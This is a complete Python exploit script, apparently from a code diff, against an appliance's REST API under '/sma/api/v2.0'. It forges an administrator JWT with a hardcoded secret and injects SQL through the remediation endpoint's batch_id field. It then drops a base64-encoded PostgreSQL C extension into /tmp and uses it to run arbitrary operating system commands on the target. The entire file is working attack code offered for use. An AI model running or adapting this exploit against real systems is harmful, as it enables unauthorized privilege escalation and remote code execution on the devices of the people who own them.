| 1 | + | #!/usr/bin/env python3 |
| 2 | + | import jwt |
| 3 | + | import json |
| 4 | + | import time |
| 5 | + | import random |
| 6 | + | import string |
| 7 | + | import base64 |
| 8 | + | import urllib3 |
| 9 | + | import datetime |
| 10 | + | import requests |
| 11 | + | import argparse |
| 12 | + | |
| 13 | + | DEVICE_TYPE = 'sma' |
| 14 | + | JWT_SECRET = 'VmxaU1MyTXlWbk5oTTJ4UVZsVmFUMVpyVm5OT2JFNXlVbFJzVVZWVU1Eaz0=' |
| 15 | + | PG_SYSTEM = [ |
| 16 | + | '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', |
| 17 | + | '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', |
| 18 | + | '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', |
| 19 | + | 'YAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAABnAAAAAQAAAAYAAAAAAAAAcAUAAAAAAABwBQAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAcAAAAAEAAAAGAAAAAAAAAIAFAAAAAAAAgAUAAAAAAAAEAgAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAHYAAAABAAAABgAAAAAAAACEBwAAAAAAAIQHAAAAAAAADgAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAB8AAAAAQAAAAIAAAAAAAAAoAcAAAAAAACgBwAAAAAAACAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAhAAAAAEAAAACAAAAAAAAAMAHAAAAAAAAwAcAAAAAAAA0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAJIAAAABAAAAAgAAAAAAAAD4BwAAAAAAAPgHAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACcAAAABwAAAAIAAAAAAAAAtAgAAAAAAAC0CAAAAAAAABgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAApgAAAAEAAAADAAAAAAAAANAIIAAAAAAA0AgAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAK0AAAABAAAAAwAAAAAAAADgCCAAAAAAAOAIAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAC0AAAABgAAAAMAAAAAAAAA8AggAAAAAADwCAAAAAAAAIABAAAAAAAAAwAAAAAAAAAIAAAAAAAAABAAAAAAAAAAawAAAAEAAAADAAAAAAAAAHAKIAAAAAAAcAoAAAAAAAAYAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAL0AAAABAAAAAwAAAAAAAACICiAAAAAAAIgKAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADGAAAAAQAAAAMAAAAAAAAAyAogAAAAAADICgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAzAAAAAgAAAADAAAAAAAAANAKIAAAAAAA0AoAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAANEAAAABAAAAMAAAAAAAAAAAAAAAAAAAANAKAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAADaAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABCwAAAAAAAIAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA6QAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAgQsAAAAAAACyAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAPUAAAABAAAAAAAAAAAAAAAAAAAAAAAAADMNAAAAAAAAPgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAADAQAAAQAAAAAAAAAAAAAAAAAAAAAAAABxDQAAAAAAABABAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAADwEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAgQ4AAAAAAACgAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAACgPAAAAAAAAeAMAAAAAAAAfAAAAGAAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAACgEgAAAAAAAN8BAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAfxQAAAAAAAAdAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA==' |
| 20 | + | ] |
| 21 | + | |
| 22 | + | |
| 23 | + | class Exploit: |
| 24 | + | def __init__(self, args): |
| 25 | + | self.url = args.url |
| 26 | + | self.username = args.username |
| 27 | + | self.password = args.password |
| 28 | + | self.command = args.command |
| 29 | + | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
| 30 | + | self.s = requests.Session() |
| 31 | + | self.s.headers = { |
| 32 | + | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', |
| 33 | + | 'Accept': 'application/json, text/plain, */*' |
| 34 | + | } |
| 35 | + | self.s.verify = False |
| 36 | + | |
| 37 | + | def trigger(self): |
| 38 | + | print('[*] Logging in') |
| 39 | + | if not self.login(): |
| 40 | + | print('[-] Exploit failed') |
| 41 | + | exit() |
| 42 | + | print('[*] Elevating privileges') |
| 43 | + | if not self.eop(): |
| 44 | + | print('[-] Exploit failed') |
| 45 | + | exit() |
| 46 | + | print('[*] Triggering command execution') |
| 47 | + | if not self.rce(): |
| 48 | + | print('[-] Exploit failed') |
| 49 | + | exit() |
| 50 | + | print('[*] Cleaning up') |
| 51 | + | if not self.cleanup(): |
| 52 | + | print('[-] Exploit failed') |
| 53 | + | exit() |
| 54 | + | print('[#] Exploit succeeded') |
| 55 | + | |
| 56 | + | def login(self): |
| 57 | + | data = { |
| 58 | + | 'data': { |
| 59 | + | 'userName': base64.b64encode(self.username.encode('latin-1')).decode('latin-1'), |
| 60 | + | 'passphrase': base64.b64encode(self.password.encode('latin-1')).decode('latin-1') |
| 61 | + | } |
| 62 | + | } |
| 63 | + | r = self.s.post(self.url + '/' + DEVICE_TYPE + |
| 64 | + | '/api/v2.0/login', data=json.dumps(data)) |
| 65 | + | if r.status_code != 200: |
| 66 | + | return False |
| 67 | + | response = json.loads(r.content) |
| 68 | + | self.jwt_token = response['data']['jwtToken'] |
| 69 | + | return True |
| 70 | + | |
| 71 | + | def eop(self): |
| 72 | + | def encode(s): |
| 73 | + | s = base64.b64encode(str(s).encode('latin-1')).decode('latin-1') |
| 74 | + | chunks = [s[i:i+76] for i in range(0, len(s), 76)] |
| 75 | + | return '\n'.join(chunks) |
| 76 | + | |
| 77 | + | def decode(s): |
| 78 | + | return base64.b64decode(s.replace('\n', '')).decode('latin-1') |
| 79 | + | |
| 80 | + | try: |
| 81 | + | token = json.loads(base64.b64decode(self.jwt_token.split('.')[1])) |
| 82 | + | except: |
| 83 | + | try: |
| 84 | + | token = json.loads(base64.b64decode( |
| 85 | + | self.jwt_token.split('.')[1] + '=')) |
| 86 | + | except: |
| 87 | + | try: |
| 88 | + | token = json.loads(base64.b64decode( |
| 89 | + | self.jwt_token.split('.')[1] + '==')) |
| 90 | + | except: |
| 91 | + | return False |
| 92 | + | cookie = decode(token['cookie']) |
| 93 | + | |
| 94 | + | server_host = decode(cookie.split('\n;')[0]) |
| 95 | + | client_ip = decode(cookie.split('\n;')[1]) |
| 96 | + | user_agent = decode(cookie.split('\n;')[2]) |
| 97 | + | server_session_id = decode(cookie.split('\n;')[3]) |
| 98 | + | system_description = decode(cookie.split('\n;')[4]) |
| 99 | + | |
| 100 | + | admin_cookie = encode('\n;'.join([ |
| 101 | + | encode(server_host), |
| 102 | + | encode(client_ip), |
| 103 | + | encode(user_agent), |
| 104 | + | encode(server_session_id), |
| 105 | + | encode(system_description), |
| 106 | + | encode('admin'), |
| 107 | + | encode('application/json, text/plain, */*') |
| 108 | + | ]) + '\n;') + '\n' |
| 109 | + | |
| 110 | + | admin_token = { |
| 111 | + | 'userName': 'admin', |
| 112 | + | 'is2FactorCheckRequired': False, |
| 113 | + | 'cookie': admin_cookie, |
| 114 | + | 'user': 'NONEUQ', |
| 115 | + | 'sessionEndTime': int(datetime.datetime.utcnow().timestamp()) + 3600 * 48, |
| 116 | + | 'exp': int(datetime.datetime.utcnow().timestamp()) + 3600 * 48 |
| 117 | + | } |
| 118 | + | |
| 119 | + | admin_token = jwt.encode(admin_token, base64.b64decode(JWT_SECRET)) |
| 120 | + | headers = { |
| 121 | + | 'jwtToken': admin_token |
| 122 | + | } |
| 123 | + | r = self.s.get(self.url + '/' + DEVICE_TYPE + |
| 124 | + | '/api/v2.0/login/privileges', headers=headers) |
| 125 | + | self.jwt_token = admin_token |
| 126 | + | return r.status_code == 200 |
| 127 | + | |
| 128 | + | def rce(self): |
| 129 | + | def sqli(query): |
| 130 | + | headers = { |
| 131 | + | 'jwtToken': self.jwt_token |
| 132 | + | } |
| 133 | + | data = { |
| 134 | + | 'data': { |
| 135 | + | 'batch_id': ''.join(random.choice(string.ascii_letters) for _ in range(8)) + '\', 0, 0, 0, 0, 0, 0, 0, 0, 0); ' + query + ' ;-- ', |
| 136 | + | 'action': 'delete', |
| 137 | + | 'initiated_username': 'x', |
| 138 | + | 'batch_name': 'x', |
| 139 | + | 'message_details': [ |
| 140 | + | { |
| 141 | + | 'mid': [1], |
| 142 | + | 'from_email': ['[email protected]'], |
| 143 | + | 'ip': '192.168.1.1', |
| 144 | + | 'subject': 'x', |
| 145 | + | 'sent_at': 1, |
| 146 | + | 'recipient_email': ['[email protected]'] |
| 147 | + | } |
| 148 | + | ] |
| 149 | + | } |
| 150 | + | } |
| 151 | + | self.s.post(self.url + '/' + DEVICE_TYPE + '/api/v2.0/remediation', |
| 152 | + | headers=headers, data=json.dumps(data)) |
| 153 | + | time.sleep(0.5) |
| 154 | + | |
| 155 | + | loid = ''.join(random.choice(string.ascii_letters) for _ in range(8)) |
| 156 | + | shell_path = '/tmp/' + \ |
| 157 | + | ''.join(random.choice(string.ascii_letters) |
| 158 | + | for _ in range(8)) + '.so' |
| 159 | + | |
| 160 | + | sqli('SELECT lo_create(0) INTO ' + loid) |
| 161 | + | for i in range(len(PG_SYSTEM)): |
| 162 | + | sqli('INSERT INTO pg_largeobject (loid, pageno, data) VALUES ((SELECT * FROM ' + |
| 163 | + | loid + '), ' + str(i) + ', (DECODE(\'' + PG_SYSTEM[i] + '\', \'base64\')))') |
| 164 | + | sqli('SELECT lo_export((SELECT * FROM ' + loid + '), \'' + shell_path + '\')') |
| 165 | + | sqli('SELECT lo_unlink((SELECT * FROM ' + loid + '))') |
| 166 | + | sqli('DROP TABLE ' + loid) |
| 167 | + | time.sleep(5) |
| 168 | + | sqli('CREATE OR REPLACE FUNCTION pg_system(TEXT) RETURNS INTEGER AS \'' + |
| 169 | + | shell_path + '\',\'pg_system\' LANGUAGE C STRICT') |
| 170 | + | sqli('SELECT pg_system(\'' + self.command + '\')') |
| 171 | + | return True |
| 172 | + | |
| 173 | + | def cleanup(self): |
| 174 | + | return True |
| 175 | + | |
| 176 | + | |
| 177 | + | if __name__ == '__main__': |
| 178 | + | parser = argparse.ArgumentParser() |
| 179 | + | parser.add_argument('--url', help='Target URL', required=True) |
| 180 | + | parser.add_argument( |
| 181 | + | '--username', help='Username of low privilege user', required=True) |
| 182 | + | parser.add_argument( |
| 183 | + | '--password', help='Password of low privilege user', required=True) |
| 184 | + | parser.add_argument('--command', help='Command to execute', required=True) |
| 185 | + | exploit = Exploit(parser.parse_args()) |
| 186 | + | exploit.trigger() |